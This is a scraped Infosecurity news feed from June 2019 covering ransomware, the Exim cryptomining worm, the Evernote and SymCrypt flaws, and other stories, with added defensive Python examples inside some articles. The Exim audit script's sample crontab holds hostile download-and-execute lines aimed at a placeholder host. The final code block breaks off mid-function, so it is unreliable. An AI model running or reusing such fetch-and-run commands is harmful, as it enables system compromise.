Info Security


Europol Gamifies Cryptocurrency Crime Prevention

Mon, 06/17/2019 - 08:59

Europol trained its members on cryptocurrency-related crime at a conference last week, announcing the development of a new game.

The cross-jurisdictional law enforcement organization claimed that over 300 experts in cryptocurrency, from both the police and private sector, attended its headquarters in The Hague for the region’s largest conference of its kind last week.

The aim was to share best practice and look at new partnership-building opportunities to combat the growth in cybercrime linked to digital currencies, as well as techniques for recovering virtual assets stolen by hackers.

At the show, Europol announced the development of a new “cryptocurrency tracing game” developed in partnership with CENTRIC (Centre of Excellence in Terrorism, Resilience, Intelligence and Organised Crime Research).

Set to launch in October, the unnamed title will be the first “law enforcement training opportunity” to use gamification techniques to train officers on cryptocurrency and investigation.

“It will allow law enforcement officers to get hands-on training and advice on tracing cryptocurrencies in criminal investigations,” according to Europol.

The news comes as the popularity of illicit cryptocurrency mining appears to be waning among the cybercrime community – at least in terms of attacks on consumers.

Consumer detections of cryptojacking dropped to almost zero in Q1, thanks in part to the decision by Coinhive to shut down its operations, although attacks against businesses continue to rise, especially in APAC, Malwarebytes said last month.

Meanwhile, attacks on cryptocurrency firms continue unabated. Just last week, hackers made off with nearly $9.7m in virtual coins after a successful attack on digital wallet provider GateHub.

Among the experts at the Europol conference were representatives from: Binance, BitBay, Bitcoin.de, Bitfinex, BitFlyer Europe, Bitnovo, Bitonic, Bitpanda, BitPay, Bitstamp, CEX, Coinbase, Coinfloor, Coinhouse, Coinpayments, CoinsPaid, Ledger, Litebit, LocalBitcoins, OKCoin, Shapeshift, SpectroCoin, Tether and Xapo.

They shared best practices on implementing Know Your Customer (KYC) policies and risk-based approaches to suspicious transactions, according to Europol.

Categories: Cyber Risk News

US Lawmakers Hear Testimony on Concerns of Deepfakes

Fri, 06/14/2019 - 17:16

Days after a video of a transformed Arnold Schwarzenegger went viral on YouTube, members of the US House Intelligence Committee heard testimony on Thursday, June 13, on concerns about the threat of "deepfakes," according to The Hill.

In his opening remarks, committee chairman Adam Schiff said, “Advances in AI and machine learning have led to the emergence of advanced digitally doctored media, so-called ‘deepfakes’ that allow malicious actors to foment chaos, division or crisis....Of great concern is that deepfakes could have the power to disrupt the democratic process, particularly the presidential race of 2020.”

Schiff noted that three years ago, lawmakers feared that falsified documents could be used to meddle in elections. “Three years later, we are on the cusp of a technological revolution that could enable even more sinister forms of deception.”

Of paramount concern is that foreign actors could use these deepfakes to spew misinformation through malicious campaigns intended to deceive the public or sway public opinion. Throughout the course of the more-than-two-hour hearing, the committee saw convincing examples of deepfakes and examples of synthetic pictures of people that don’t exist at all.

Clint Watts, former FBI special agent and senior fellow for the Alliance for Securing Democracy at the German Marshall Fund, was part of a four-person panel that testified before the lawmakers on the potential for foreign adversaries to craft synthetic media capabilities that could be used against the US.

“The falsification of audio and video allows manipulators to dupe audience members in highly convincing ways, provoking emotional responses that can lead to widespread mistrust,” Watts warned.

It’s not only lawmakers that are worried about the potential threat of deepfakes. In a June 13 blog post, Nieman Lab looked at myriad ways that deepfakes could be used to manipulate the outcome of an election, noting that “deepfakes have the potential to wreak havoc in contexts such as news, where audio and video are treated as a form of evidence that something actually happened.

“So-called 'cheapfakes,' such as the widely circulated clip of House Speaker Nancy Pelosi, have already demonstrated the potential for low-tech manipulated video to find a ready audience. The more advanced technology creates a whole new level of speed, scale, and potential for personalization of such disinformation.”

Categories: Cyber Risk News

Malware a Serious Threat for Industrial Orgs

Fri, 06/14/2019 - 17:09

During Q1 2019, Cryptolocker malware spiked to account for 24% of all malware used, up from only 9% in Q4 2018, according to a new report from Positive Technologies.

“This malware is often used in combination with phishing, with hackers constantly inventing new ways of deceiving users and making them pay a ransom. Healthcare has proved to be a favorite target of cryptolockers. Medical institutions are more likely to pay a ransom compared to other businesses, perhaps because of patients' lives and health being at stake,” the report stated.

“Phishing remains an effective way of delivering malware. But email is far from the only channel of malware distribution. For example, users frequently download files from torrent trackers, on which the risk of malware infection grows exponentially. Under the guise of a movie, attackers distributed malware used for spoofing addresses of bitcoin and Ethereum wallets when the information is copied from the clipboard. Users also often download programs from official app stores.”

Also up during Q1 was the number of unique threats, which exceeded the numbers from Q1 of last year by 11%. The report noted an increasing number of cases of infection using multifunctional Trojans, with attackers most often hitting government agencies (16%), medical institutions (10%) and industrial companies (10%).

“Malware combining multiple types of Trojans is becoming more and more widespread. Due to its flexible modular architecture, this malware can perform many different functions. For example, it can display advertising and steal user data at the same time,” the report said.

While Cryptolocker malware has risen, the percentage of hidden mining has decreased to 7% from the previously reported 9% in Q4 2018.

“Hackers have started to upgrade miners, turning them into multifunctional Trojans. Once inside a system with low computational power on which mining is uneconomical, such Trojans start acting as spyware and steal data,” the report said. According to the research, cyber-criminals are using self-developed spyware or hacking government websites to steal data from governments.

Categories: Cyber Risk News

Canadian City Fell Prey to a $375K Phish

Fri, 06/14/2019 - 15:46

Yet another city has fallen victim to "a complex phishing email." The scam cost Burlington, Ontario, Canada, C$503,000 – the equivalent of nearly US$375,000.

“On Thursday, May 23, the City of Burlington discovered it was a victim of fraud. A single transaction was made to a falsified bank account as a result of a complex phishing email to City staff requesting to change banking information for an established City vendor. The transaction was in the form of an electronic transfer of funds made to the vendor...and was processed on May 16," the city announced.

Burlington immediately contacted law enforcement and a criminal investigation is underway, according to the announcement.

“Cyber-attacks are on the rise, and phishing emails that involve the human factor are responsible for a great number of these breaches. Organizations globally are realizing the need to invest in employee training and deploy different training solutions in the hope of mitigating the risk of data breaches,” said Shlomi Gian, CEO at CybeReady.

“Instead of increasing spending and IT effort, organizations should opt for smart solutions that guarantee change in employee behavior. Effective training should not become an IT and financial burden. Increased awareness might be the only way to reduce the risk of another incident like this in the foreseeable future.”

According to Global News Canada, none of Burlington’s systems have been impacted by the transaction. At this time, the city is not providing any additional information, but experts advise that all organizations continue to invest in their human capital via security training and awareness.

“Humans remain the weakest link in any organization. Properly implemented security controls can reduce the risk of human error but not eliminate it. Worse, cyber-criminals will now purposely target smaller organizations that cannot afford to invest in their cybersecurity,” said Ilia Kolochenko, founder and CEO of web security company ImmuniWeb.

Categories: Cyber Risk News

Home Secretary Signs Assange US Extradition Request

Fri, 06/14/2019 - 10:30

The UK home secretary Sajid Javid has signed a US request for the extradition of WikiLeaks founder Julian Assange.

The Tory leadership hopeful told BBC Radio 4’s Today program on Thursday that the controversial figure is one step closer to a trial on US soil, where he faces an 18-count indictment.

“He’s rightly behind bars. There’s an extradition request from the US that is before the courts tomorrow but yesterday I signed the extradition order and certified it and that will be going in front of the courts tomorrow,” said Javid.

“It is a decision ultimately for the courts, but there is a very important part of it for the home secretary and I want to see justice done at all times and we’ve got a legitimate extradition request, so I’ve signed it, but the final decision is now with the courts.”

The Department of Justice initially indicted Assange on hacking offenses related to Chelsea Manning’s alleged unauthorized access to Pentagon computers in order to obtain classified information.

However, that was superseded by a new 18-count indictment detailing charges related to Assange’s publishing of that classified information, which is alleged to have harmed national security.

The trove of hundreds of thousands of secret diplomatic cables and other documents relating to US wars in Afghanistan and Iraq contained unredacted names of US informants and diplomats in those countries, allegedly putting their physical safety at risk.

However, press freedom advocates have warned that the charges could set a dangerous precedent, given that WikiLeaks was acting in the public interest in revealing US military cover-ups such as the accidental shooting of two Iraqis working for Reuters news agency in 2007.

It’s also claimed that as Assange is not a US citizen and his crimes were not committed on US soil, he should not be facing extradition.

Former editor of the Guardian, Alan Rusbridger, claimed the charges are “attempting to criminalize things journalists regularly do as they receive and publish true information given to them by sources or whistleblowers.”

However, Assange has also been a controversial figure: his decision to publish private emails hacked by alleged Russian state spies from Democratic Party officials is said to have given Donald Trump a key advantage in the 2016 race for the White House.

Categories: Cyber Risk News

Millions of Email Servers at Risk from Cryptomining Worm

Fri, 06/14/2019 - 08:50

Researchers have spotted a major new cyber-attack campaign targeting millions of Linux email servers around the world with a cryptomining malware payload.

Exim accounts for over half (57%) of the globe’s internet email servers. Over 3.5 million are at risk from a vulnerability discovered last week, CVE-2019-10149, according to security vendor Cybereason.

There appear to have been two waves of attack: in the first, attackers initially pushed out exploits from a command and control (C2) server on the clear web. The second seems to be more sophisticated.

“This is a highly pervasive campaign that installs cron jobs for persistence and downloads several payloads for different stages of the attack. In one of those stages, one of the payloads is a port scanner written in python. It looks for additional vulnerable servers on the internet, connects to them, and infects them with the initial script,” wrote Cybereason.

“In the attack, the attackers add an RSA authentication key to the SSH server which allows them to connect to the server as root and own it completely.”

Researchers are still working to assess the breadth of the campaign, but with worm-like capabilities in play, system administrators are urged to patch their Exim servers now, as well as find and remove any cron jobs.
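The two persistence indicators named in the Cybereason write-up, an SSH key added for root and cron jobs that fetch payloads, are exactly what an administrator should be looking for after patching. The following is an added defender-side audit example, not code from the original article or from Cybereason; the authorized_keys content, the crontab lines, the `payload.example.invalid` host and the baseline of trusted key fingerprints are all constructed placeholders for the example.

```python
"""Audit an authorized_keys file and a crontab for the two persistence indicators
described in the article: an unexpected SSH public key and cron entries that pull
and execute remote content. All sample data below is constructed for this example."""
import base64
import hashlib
import re
from typing import Dict, List, Set, Tuple

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def fingerprint(blob_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64-encoded key blob (padding stripped)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> List[Tuple[str, str, str]]:
    """Return (key type, fingerprint, comment) per key line. Blank lines and comments are
    skipped; a leading options field without embedded spaces (e.g. no-pty) is tolerated."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            continue  # not a parseable key line
        entries.append((tokens[idx], fingerprint(tokens[idx + 1]), " ".join(tokens[idx + 2:])))
    return entries


def unknown_keys(text: str, baseline: Set[str]) -> List[Tuple[str, str, str]]:
    """Keys whose fingerprint is not in the administrator's known-good baseline."""
    return [entry for entry in parse_authorized_keys(text) if entry[1] not in baseline]


# Cron heuristics: remote fetch piped straight into a shell, execution out of a
# world-writable temp directory, or a fetch that re-runs at every boot.
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sh|bash|dash)\b")
TMP_EXEC_RE = re.compile(r"\b(sh|bash|python\d?)\s+/(tmp|dev/shm|var/tmp)/")


def suspicious_cron_entries(crontab_text: str) -> List[Tuple[str, List[str]]]:
    """Return (line, reasons) for every crontab line that trips at least one heuristic."""
    flagged = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if DOWNLOAD_RE.search(line) and PIPE_TO_SHELL_RE.search(line):
            reasons.append("downloads and pipes to a shell")
        if TMP_EXEC_RE.search(line):
            reasons.append("executes from a world-writable temp directory")
        if line.startswith("@reboot") and DOWNLOAD_RE.search(line):
            reasons.append("re-fetches remote content at every boot")
        if reasons:
            flagged.append((line, reasons))
    return flagged


# Constructed sample data (the key material is arbitrary bytes, not real keys).
TRUSTED_KEYS = [
    "ssh-ed25519 " + base64.b64encode(b"constructed-trusted-key-material").decode() + " admin@bastion",
]
BASELINE: Set[str] = {fp for _, fp, _ in parse_authorized_keys("\n".join(TRUSTED_KEYS))}
SAMPLE_AUTHORIZED_KEYS = "\n".join(TRUSTED_KEYS + [
    "# entry not present in the baseline",
    "ssh-rsa " + base64.b64encode(b"constructed-unexpected-key-material").decode() + " root@unknown",
])
SAMPLE_CRONTAB = """\
# constructed sample crontab
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s http://payload.example.invalid/x | sh
@reboot wget -q -O /tmp/a http://payload.example.invalid/b && sh /tmp/a
"""


def audit() -> Dict[str, list]:
    """Run both checks over the constructed samples and return the findings."""
    return {"unknown_keys": unknown_keys(SAMPLE_AUTHORIZED_KEYS, BASELINE),
            "suspicious_cron": suspicious_cron_entries(SAMPLE_CRONTAB)}


if __name__ == "__main__":
    for kind, findings in audit().items():
        print(kind)
        for finding in findings:
            print("  ", finding)
```

In practice the baseline would be the fingerprints recorded when the host was provisioned, and the same parser can be pointed at every user's `~/.ssh/authorized_keys` plus `/etc/crontab`, `/etc/cron.d/*` and each user's crontab; the heuristics are deliberately narrow and should be treated as a starting point for review rather than a verdict.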

“It is clear that the attackers went to great lengths to try to hide the intentions of their newly-created worm. They used hidden services on the TOR network to host their payloads and created deceiving windows icon files in an attempt to throw off researchers and even system administrators who are looking at their logs,” concluded Cybereason.

“The prevalence of vulnerable Exim servers allows attackers to compromise many servers in a relatively short period of time, as well as generate a nice stream of cryptocurrency revenue.”

Categories: Cyber Risk News

MI5 Breached Surveillance Law for Years

Fri, 06/14/2019 - 08:05

MI5’s breaches of the law in its handling and retention of bulk surveillance data are much worse than first thought, according to new legal documents revealed as part of an ongoing case.

Rights group Liberty is challenging outgoing Prime Minister Theresa May’s flagship Snoopers’ Charter, aka the Investigatory Powers Act (IPA): a law which allows the security services to hack devices and intercept communications en masse, collecting and storing info on countless innocent citizens.

Last month it was revealed that MI5 had breached IPA safeguards, something home secretary Sajid Javid described as “compliance risks” that require “serious and required immediate mitigation.”

However, this week Liberty disclosed 10 further documents and letters from MI5 and watchdog the Investigatory Powers Commissioner (IPCO) detailing “undoubtedly unlawful” conduct from the security service for as long as the IPA has been in existence.

“Without seeking to be emotive, I consider that MI5’s use of warranted data...is currently, in effect, in ‘special measures’ and the historical lack of compliance... is of such gravity that IPCO will need to be satisfied to a greater degree than usual that it is ‘fit for purpose',” the commissioner wrote in one.

MI5 failed to safeguard citizens’ privacy by, for example, destroying material in a timely manner or protecting legally privileged material, and knew about such “compliance gaps” for three years before telling the IPCO, according to Liberty.

MI5’s false assurances extended to its maintaining to senior judges that data handling obligations were being met, resulting in warrants for bulk surveillance being issued that otherwise would not have been forthcoming.

The new evidence also revealed that personal data collected by MI5 is being stored in “ungoverned spaces,” and that the intelligence service’s lawyers claim there is “a high likelihood [of it] being discovered when it should have been deleted, in a disclosure exercise leading to substantial legal or oversight failure.”

The government is now trying to minimize the fallout from more damaging revelations by applying for further details to be provided to the court through private hearings.

“These shocking revelations expose how MI5 has been illegally mishandling our data for years, storing it when they have no legal basis to do so. This could include our most deeply sensitive information – our calls and messages, our location data, our web browsing history,” argued Liberty lawyer, Megan Goulding.

“It is unacceptable that the public is only learning now about these serious breaches after the government has been forced into revealing them in the course of Liberty’s legal challenge. In addition to showing a flagrant disregard for our rights, MI5 has attempted to hide its mistakes by providing misinformation to the Investigatory Powers Commissioner, who oversees the government’s surveillance regime.”

Categories: Cyber Risk News

Employees Out of Work After ASCO Hit by Ransomware

Thu, 06/13/2019 - 18:34

Nearly 1,000 employees in ASCO’s Zaventem, Belgium, office have been left incapable of doing their jobs after a ransomware attack crippled the aircraft-parts manufacturer, according to a June 11 report from vrt NWS.

“From the ISF’s standpoint, everyone who has access to an organization’s information and systems should be made aware of the risks from ransomware and the actions required to minimize those risks,” said Steve Durbin, managing director of the Information Security Forum.

“The bottom line is that if you can’t do without the information and you don’t have a backup, then paying is the only option you have left to recapture your data. Therefore, prevention is the way to go to better protect yourself.”

ASCO temporarily shut down operations at its headquarters in Zaventem in the aftermath of the attack, as was reported by Data News.

Spirit AeroSystems acquired ASCO, a Belgian organization, in 2018. Spirit AeroSystems reportedly said that it would also temporarily cease production in other countries, according to a June 13 post from Tripwire.

“Initially, ASCO merely disclosed that someone had hacked its servers. It did not supply additional details at that time....As of this writing, it’s unclear what ransomware family was responsible for the infection or how it gained access to ASCO’s network,” Tripwire’s David Bisson wrote.

“This latest ransomware attack against a critical supplier of airplane parts is another reminder on how destructive ransomware continues to be to organizations,” said Joseph Carson, chief security scientist at Thycotic.

“Ransomware, however, should be a lower risk to businesses if they follow common industry best practices such as the introduction of a solid incident response plan, backup and recovery practice, cybersecurity awareness training and strong privilege and access management controls to limit administrator access.”

“Supply chains are difficult to secure. They create risk that is hard to identify, complicated to quantify and costly to address. A compromise anywhere in the supply chain can have just as much impact on your business, your bottom line, and your reputation, as one from within the organization."

Categories: Cyber Risk News

Gaming's All Fun and Games Till Someone Gets Hacked

Thu, 06/13/2019 - 18:27

Cyber-criminals are playing games with the gaming industry, according to two new reports published by Akamai and Kaspersky.

The Akamai 2019 State of the Internet/Security Web Attacks and Gaming Abuse Report found that cyber-criminals have targeted the gaming industry by carrying out 12 billion credential-stuffing attacks against gaming websites, with a total of 55 billion credential-stuffing attacks across all industries within the 17-month period analyzed in the report (November 2017–March 2019).

SQL injection (SQLi) attacks account for 65% of all web application attacks, while local file inclusion (LFI) attacks represent only 24.7%, according to the report. As SQLi has grown as an attack vector, the report found that the link between SQLi and credential-stuffing attacks is almost direct: credentials taken through injection are what feed the stuffing campaigns.

“One reason that we believe the gaming industry is an attractive target for hackers is because criminals can easily exchange in-game items for profit,” said Martin McKeay, security researcher at Akamai and editorial director of the State of the Internet/Security Report. “Furthermore, gamers are a niche demographic known for spending money, so their financial status is also a tempting target.”

In related news, research from Kaspersky confirmed that, unfortunately, more and more video games are being used to distribute malware to unsuspecting users. According to the research, more than 930,000 users were hit by malware attacks in the last 12 months, which cyber-criminals have achieved through crafting and distributing fake copies of popular video games, including "Minecraft," "Grand Theft Auto V" and "Sims 4."

Malware-disguised "Minecraft" accounted for around 30% of attacks, with over 310,000 users hit. Coming in at a distant second place was "Grand Theft Auto V," which targeted more than 112,000 users.

According to the researchers, criminals were also found trying to lure users into downloading malicious files pretending to be unreleased games. Spoofs of at least 10 pre-release games were seen, with 80% of detections focused on "FIFA 20," "Borderlands 3," and the "Elder Scrolls 6."

“For months now we see that criminals are exploiting entertainment to catch users by surprise – be it series of popular TV shows, premieres of top movies or popular video games,” said Maria Fedorova, security researcher at Kaspersky, in a press release.

“This is easy to explain: people can be less vigilant when they just want to relax and have fun. If they’re not expecting to find malware in something fun they’ve used for years, it won’t take an advanced-threat like infection vector to succeed. We urge everyone to stay alert, avoid untrusted digital platforms and suspicious-looking offers, install security software and perform a regular security scan of all devices used for gaming.”

Categories: Cyber Risk News

AGs Warn AMCA Breach Impact Rose to Over 20 Million

Thu, 06/13/2019 - 15:40

After the data of more than 20 million patients was potentially exposed during the cyber-attack against American Medical Collection Agency (AMCA), the third-party collection agency for laboratories, hospitals, physician groups, medical providers and others, attorneys general (AGs) in such states as New Jersey, Illinois, Connecticut and Maryland have started alerting citizens and looking for answers to exactly what happened.

“The healthcare industry may be the most vulnerable of all industries to cyber-attacks. It's about the data healthcare operators have access to. In the AMCA cyber-heist, data stolen included patient PII [personally identifiable information] and lab test info but also included healthcare provider info, credit/debit card info, bank account info and social security numbers. This was a ‘treasure trove’ of data to a cyber-thief,” said Jonathan Deveaux, head of enterprise data protection at comforte AG.

The third-party data breach impacted both Quest Diagnostic and LabCorp, as well as BioReference Laboratories, CareCentrix and Sunrise Laboratories. According to LabCorp’s disclosure notice, “That information could include first and last name, date of birth, address, phone, date of service, provider, and balance information. AMCA’s affected system also included credit card or bank account information that was provided by the consumer to AMCA (for those who sought to pay their balance).”

Maryland AG Brian E. Frosh warned consumers to review their financial and medical records, according to WJZ-13. “Massive data breaches like the one experienced by the AMCA are extremely alarming, especially considering the likelihood that personal, financial, and medical information may now be in the hands of thieves and scammers,” Frosh told WJZ-13. “I strongly urge consumers to take steps to ensure that their information and personal identity is protected.”

Armed with this collection of patient data, criminals are in a good position to fraudulently collect money from those patients, according to Tim Erlin, VP, product management and strategy at Tripwire. “Imagine if you received an email with accurate details about a medical bill you actually have and a link to make a payment. It only takes a handful of people to fall for this scam in order for it to be worthwhile for the criminal.”

Categories: Cyber Risk News

UK Orgs Lose 2 & 1/2 Months a Year on Poor Password Management

Thu, 06/13/2019 - 10:25
UK Orgs Lose 2 & 1/2 Months a Year on Poor Password Management

Businesses in the UK lose an average of two-and-a-half months per year in time spent dealing with poor password management, according to new research from OneLogin.

As detailed in its report Password Practices 2019, OneLogin surveyed 600 global IT professionals to gauge how companies are protecting passwords in terms of tools, guidelines and practices.

The key findings indicated that companies spend too much time resetting passwords that users have forgotten, believe they are dramatically safer than their password practices actually suggest and have failed to move quickly to adopt the tools that solve the password problem, like SSO, SAML, OAuth and MFA.

What's more, businesses are not heeding the latest password guidelines, OneLogin claimed, specifically regarding password rotation and checking passwords against lists of commonly-used passwords, compromised passwords and rainbow tables. Two thirds of those surveyed admitted they do not check passwords against common password lists and 78% do not check employee passwords against password complexity algorithms.
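As an added example (not OneLogin's code and not taken from its report), the Python below implements the checks the survey says most organizations skip: it rejects passwords that appear on a common-password list or in a breach corpus, and it looks the breach corpus up by SHA-1 prefix the way the Have I Been Pwned range API does, so the full hash never leaves the client. In line with NIST SP 800-63B it also screens for the username and a minimum length, and deliberately enforces no composition rules or scheduled rotation. The common-password list and the breached hashes are constructed for the example; a real deployment would load large published lists.

```python
import hashlib

# Constructed sample data for this example (not real breach data).
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein", "welcome1"}
_BREACHED_PLAINTEXTS = ["Summer2019!", "P@ssw0rd", "football", "iloveyou"]
BREACHED_SHA1 = {hashlib.sha1(p.encode("utf-8")).hexdigest().upper()
                 for p in _BREACHED_PLAINTEXTS}


def range_lookup(prefix):
    """Stand-in for a k-anonymity range query: return every breached-hash
    suffix (SHA-1 minus its first five hex chars) filed under the prefix.
    Only the 5-char prefix would be sent over the network; matching is local."""
    return {h[5:] for h in BREACHED_SHA1 if h.startswith(prefix)}


def is_breached(password):
    """True if the password's SHA-1 appears in the (simulated) breach corpus."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    return suffix in range_lookup(prefix)


def check_password(password, username="", min_len=12):
    """Return the list of policy violations; an empty list means acceptable.
    Codes: too_short, common_password, contains_username, breached."""
    problems = []
    if len(password) < min_len:
        problems.append("too_short")
    if password.lower() in COMMON_PASSWORDS:
        problems.append("common_password")
    if username and username.lower() in password.lower():
        problems.append("contains_username")
    if is_breached(password):
        problems.append("breached")
    return problems


if __name__ == "__main__":
    for candidate in ["password", "P@ssw0rd", "alice-Winter2019",
                      "correct horse battery staple"]:
        print(candidate, "->", check_password(candidate, username="alice") or "ok")
```

The breach check hashes with SHA-1 only because that is the lookup key the public range service uses; it says nothing about how the password should be stored, which should still be a slow salted hash such as bcrypt or Argon2.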

Thomas Pedersen, OneLogin’s chief technology officer and founder, said: “The benefits of innovative technology to facilitate modern business practices is clearly yet to be recognized by the average UK business overwhelmed by day-to-day password management processes. Trust must be built between businesses and B2B tech vendors, as a lot of businesses are stubbornly struggling in the dark and avoiding the topic of ‘digital transformation’ to free up employee and operational efficiencies.”

Pedersen urged businesses to streamline and simplify Identity and Access Management processes by implementing SSO and MFA tools.

“By doing so they will be freeing up skilled IT professionals to focus on tasks that drive greater business value and connect dispersed workforces. Organizations that don’t, may not survive the next two to five years. The quick adoption of automated tools is key to business survival.”

Categories: Cyber Risk News

“Major Flaw” Discovered in Evernote’s Chrome Extension

Thu, 06/13/2019 - 09:01
“Major Flaw” Discovered in Evernote’s Chrome Extension

A major flaw has been discovered in the code of the Web Clipper Chrome extension of note-taking service Evernote.

The flaw, a universal cross-site scripting (UXSS) vulnerability tracked as CVE-2019-12592 that could have allowed threat actors to extract personal information from the browser environment, was unearthed by security company Guardio and disclosed to Evernote in late May. Within a week, Evernote addressed the issue and rolled out a complete fix.

According to Guardio, the logical coding error in the Web Clipper extension could have allowed an attacker to bypass the browser’s same-origin policy, gaining code execution in iframes beyond Evernote’s domain. With the browser’s domain-isolation mechanism broken, injected code could perform actions on behalf of the user and access sensitive user information on affected third-party web pages and services, including authentication data, financial details, private conversations on social media, personal emails and more.

Michael Vainshtein, CTO at Guardio, said: “The vulnerability we discovered is a testament to the importance of scrutinizing browser extensions with extra care. People need to be aware that even the most trusted extensions can contain a pathway for attackers. All it takes is a single unsafe extension to compromise anything you do or store online. The ripple effect is immediate and intense.”

The story highlights the importance of swift vulnerability disclosure, response and remediation, particularly given the fact that the flaw had the potential to affect any number of Evernote’s users (around 4,600,000 at the time of discovery).

Categories: Cyber Risk News

KnowBe4 Gets Whopping $300m in Funding

Wed, 06/12/2019 - 17:17
KnowBe4 Gets Whopping $300m in Funding

A private equity giant has invested an additional $300 million in cybersecurity awareness firm KnowBe4 only three months after announcing its initial investment of $50 million, according to Fortune.

At the helm of the company, which provides integrated security awareness training and a simulated phishing platform, are Stu Sjouwerman, CEO, and Kevin Mitnick, chief hacking officer. Founded in 2010, the company now boasts more than 25,000 users across the globe from highly regulated industries to global organizations.

“The company helps organizations address the human element of security by raising awareness of ransomware, CEO fraud and other social engineering tactics through a new-school approach to security awareness training,” the June 12 press release said.

“Having secured additional funding, as well as 'unicorn' status as a private company valued at $1 billion, KnowBe4 now plans to continue an ambitious international expansion that, in 2019 alone, has seen it acquire two cybersecurity companies located in different parts of the globe: Brazil-based El Pescador and Norway-based CLTRe,” Fortune reported.

In response to the company earning unicorn status, KnowBe4 CEO Stu Sjouwerman lauded the relationship the company has built with its investment firm, KKR. Sjouwerman’s blog post emphasized his plentiful gratitude:

I'd like to thank you for your trust in us, and for telling your friends about our platform. This is only the beginning of building a strong human firewall and we still need all the help we can get.

So from the bottom of our hearts, thank you so much. We will continue doing our level best to help you keep your organization safe, and please keep spreading the word.

“Organizations are beginning to understand that when it comes to security, building a human firewall takes precedence over merely deploying technology,” Sjouwerman told Infosecurity. “This investment is a representation of what we're seeing in the market, which is more emphasis placed on the area of security awareness training and education as a key way to manage the ongoing problem of social engineering.”

Categories: Cyber Risk News

Philly Courts Still Down After Cyber-Attack

Wed, 06/12/2019 - 16:51
Philly Courts Still Down After Cyber-Attack

After a May 21, 2019, cyber-attack downed Philadelphia’s online court system for e-filing and docketing services, issues remain throughout the county, according to Government Technology.

On June 11, Government Technology reported that the computer networks of the Luzerne County Correctional Facility in Pennsylvania continue to be impacted, leaving inmates unable to order items from the jail commissary.

“The First Judicial District and City OIT are working in concert to ensure the safety of the First Judicial District’s electronic web system following the discovery of malware on a limited number of FJD workstations. As a precautionary measure the FJD’s website, employee email accounts, and electronic filing (e-file) have been temporarily suspended,” a May 31 notice from the Philadelphia Courts First Judicial District of Pennsylvania stated.

“We are currently unable to provide more information concerning this virus so as not to provide any detail-specific information that could jeopardize the remediation process we are engaged in. In addition to City OIT, the FJD is contracting the services of a firm specializing in cybersecurity to assist in getting impacted operations restored safely.”

Since then, the courts have been using social media to engage with members of the community. On June 10, the Philadelphia courts expressed appreciation for the community’s patience as employees work to meet filing needs.

The city has reportedly hired a cybersecurity firm to investigate the attack, though said firm has not been named.

“Declining to name a publicly funded contractor has raised eyebrows. So far, the court has described the unnamed vendor as a firm 'specializing in cyber security to assist in getting impacted operations restored safely.' Courts spokesperson Marty O’Rourke has declined repeated requests for the name of the vendor – as well as the amount the city is paying for these services,” Billy Penn’s Max Marin reported.

Categories: Cyber Risk News

Flaw in SymCrypt Can Trigger DoS

Wed, 06/12/2019 - 15:33
Flaw in SymCrypt Can Trigger DoS

A vulnerability in SymCrypt, the cryptographic library at the core of Microsoft's Windows OS, can trigger a denial-of-service (DoS) condition on Windows 8 and later, sending the library into an infinite loop "when calculating the modular inverse on specific bit patterns with bcryptprimitives!SymCryptFdefModInvGeneric," according to Tavis Ormandy, a researcher with Google's Project Zero.

“I noticed a bug in SymCrypt, the core library that handles all crypto on Windows. It's a DoS, but this means basically anything that does crypto in Windows can be deadlocked (s/mime, authenticode, ipsec, iis, everything). Microsoft committed to fixing it in 90 days, then didn't,” Ormandy tweeted.

Now that we’ve entered into the 91st day, Ormandy has gone public with what he said is a relatively low severity bug. “I've been able to construct an X.509 certificate that triggers the bug. I've found that embedding the certificate in an S/MIME message, authenticode signature, schannel connection, and so on will effectively DoS any windows server (e.g., ipsec, iis, exchange, etc.) and (depending on the context) may require the machine to be rebooted. Obviously, lots of software that processes untrusted content (like antivirus) call these routines on untrusted data, and this will cause them to deadlock,” Ormandy wrote in the Project Zero vulnerability report.
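The report describes a modular-inverse routine that fails to terminate on particular inputs. The Python below is an added illustration of that bug class, not SymCrypt's code and not a reproduction of its specific trigger: a binary extended-Euclid inverse written without precondition checks, which spins forever when gcd(a, m) != 1 because u collapses to zero inside the halving loop (a max_steps cap stands in for the hang), beside a hardened version that validates the operands and bounds the loop so attacker-supplied numbers, such as public-key parameters parsed from a certificate, fail fast instead of stalling the process. The chosen trigger (non-coprime inputs) is an assumption made for the example.

```python
from math import gcd


def _halve_mod(x, m):
    """Exact x/2 modulo odd m: if x is odd, x + m is even (m odd), so divide that."""
    return x // 2 if x % 2 == 0 else (x + m) // 2


def binary_modinv_naive(a, m, max_steps=10_000):
    """a^-1 mod m by the binary extended Euclid algorithm, written the way such
    routines often are: it assumes m is odd and gcd(a, m) == 1 and never checks.
    With gcd(a, m) != 1, u reaches 0 and `while u % 2 == 0` never exits.
    max_steps only exists so the demo returns None instead of hanging."""
    u, v = a % m, m
    x1, x2 = 1, 0
    steps = 0
    while u != 1 and v != 1:
        while u % 2 == 0:
            u, x1 = u // 2, _halve_mod(x1, m)
            steps += 1
            if steps > max_steps:
                return None          # would be an infinite loop in real code
        while v % 2 == 0:
            v, x2 = v // 2, _halve_mod(x2, m)
            steps += 1
            if steps > max_steps:
                return None
        if u >= v:
            u, x1 = u - v, x1 - x2
        else:
            v, x2 = v - u, x2 - x1
    return x1 % m if u == 1 else x2 % m


def safe_modinv(a, m):
    """Same algorithm with its preconditions enforced and a work budget.
    Every halving shrinks u or v and every subtraction yields an even number,
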